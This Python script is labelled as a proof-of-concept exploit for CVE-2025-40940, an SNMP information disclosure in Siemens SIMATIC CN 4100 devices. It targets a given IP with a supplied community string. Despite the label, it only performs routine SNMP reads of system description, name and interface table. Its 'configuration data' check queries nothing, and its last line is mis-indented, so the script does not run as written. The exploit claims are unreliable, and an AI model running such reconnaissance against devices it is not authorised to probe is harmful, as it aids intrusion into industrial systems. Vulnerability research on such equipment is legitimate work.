# CVE-2025-40940 PoC - SIMATIC CN 4100 SNMP Information Disclosure
# Description: Exploits inconsistent SNMP behavior to extract sensitive data
import socket
import sys
from pysnmp.hlapi import *
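def snmp_get(community, target_ip, oid, version='2c'):
    """Send one SNMP GET for ``oid`` to ``target_ip`` and return its value.

    Args:
        community: SNMP community string presented to the agent.
        target_ip: Address of the agent; the request is sent to UDP port 161.
        oid: Object identifier to fetch, in dotted-decimal form.
        version: ``'2c'`` selects SNMPv2c (mpModel=1); any other value
            selects SNMPv1 (mpModel=0).

    Returns:
        The value of the first varbind in the response as a string, or
        ``None`` when the request fails at the transport level (timeout,
        unreachable host), when the agent reports a non-zero errorStatus,
        or when the response carries no varbinds at all.
    """
    mp_model = 1 if version == '2c' else 0
    iterator = getCmd(
        SnmpEngine(),
        CommunityData(community, mpModel=mp_model),
        UdpTransportTarget((target_ip, 161)),
        ContextData(),
        ObjectType(ObjectIdentity(oid)),
    )
    error_indication, error_status, error_index, var_binds = next(iterator)

    # Transport-level failure: no usable response was received.
    if error_indication:
        print(f"[ERROR] {error_indication}")
        return None

    # Protocol-level error returned by the agent (e.g. noSuchName). The
    # previous version ignored errorStatus and could hand back an error
    # placeholder as if it were real data.
    if error_status:
        bad_oid = '?'
        if error_index and int(error_index) <= len(var_binds):
            bad_oid = var_binds[int(error_index) - 1][0]
        print(f"[ERROR] {error_status.prettyPrint()} at {bad_oid}")
        return None

    # An empty varbind list is reported as "no value" explicitly instead of
    # falling off the end of the function with an implicit None.
    if not var_binds:
        return None
    return str(var_binds[0][1])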
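def snmp_walk(community, target_ip, oid_base, version='2c'):
    """Walk the MIB subtree rooted at ``oid_base`` using SNMP GETNEXT.

    Args:
        community: SNMP community string presented to the agent.
        target_ip: Address of the agent; requests go to UDP port 161.
        oid_base: Root of the subtree to enumerate, in dotted-decimal form.
        version: ``'2c'`` selects SNMPv2c (mpModel=1); any other value
            selects SNMPv1 (mpModel=0).

    Returns:
        A list of ``(oid, value)`` string tuples, one per varbind received.
        The walk is best-effort: on a transport error or a non-zero
        errorStatus from the agent it stops and returns what was collected
        so far (possibly an empty list).
    """
    mp_model = 1 if version == '2c' else 0
    iterator = nextCmd(
        SnmpEngine(),
        CommunityData(community, mpModel=mp_model),
        UdpTransportTarget((target_ip, 161)),
        ContextData(),
        ObjectType(ObjectIdentity(oid_base)),
        lexicographicMode=False,  # stop once the walk leaves oid_base
    )

    results = []
    for error_indication, error_status, error_index, var_binds in iterator:
        # Transport-level failure: report it instead of stopping silently.
        if error_indication:
            print(f"[ERROR] {error_indication}")
            break
        # Agent-reported error; the previous version kept appending the
        # varbinds of an error response as though they were data.
        if error_status:
            print(f"[ERROR] {error_status.prettyPrint()} at index {error_index}")
            break
        results.extend((str(name), str(value)) for name, value in var_binds)
    return results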
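def main():
    """Command-line entry point: query a few standard MIB-2 objects on one host.

    Usage: ``python cve_2025_40940_poc.py <target_ip> <community_string>``.
    Exits with status 1 when either argument is missing. Output goes to
    stdout; lookups that fail are simply not printed.
    """
    if len(sys.argv) < 3:
        print("Usage: python cve_2025_40940_poc.py <target_ip> <community_string>")
        sys.exit(1)
    target_ip = sys.argv[1]
    # NOTE(review): the community string is a credential; taking it from
    # argv leaves it visible in shell history and process listings.
    community = sys.argv[2]

    print(f"[*] Targeting {target_ip} - CVE-2025-40940 PoC")
    print("[*] Testing SNMP service availability...")

    # MIB-2 system group: sysDescr.0 and sysName.0.
    sys_descr = snmp_get(community, target_ip, '1.3.6.1.2.1.1.1.0')
    if sys_descr:
        print(f"[+] System Description: {sys_descr}")
    sys_name = snmp_get(community, target_ip, '1.3.6.1.2.1.1.5.0')
    if sys_name:
        print(f"[+] System Name: {sys_name}")

    # MIB-2 ifTable (ifEntry subtree). snmp_walk returns one tuple per
    # varbind, so the count below is of returned cells, not of distinct
    # interfaces.
    print("[*] Enumerating network interfaces...")
    if_table = snmp_walk(community, target_ip, '1.3.6.1.2.1.2.2.1')
    print(f"[+] Found {len(if_table)} interface entries")

    # No configuration object is queried here; this step only prints a notice.
    print("[*] Checking for exposed configuration data...")
    print("\n[!] Note: This PoC demonstrates SNMP information disclosure")
    print("[!] Requires valid community string and high-privilege access")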
# Script entry guard: run main() only when executed directly, not on import.
if __name__ == "__main__":
main()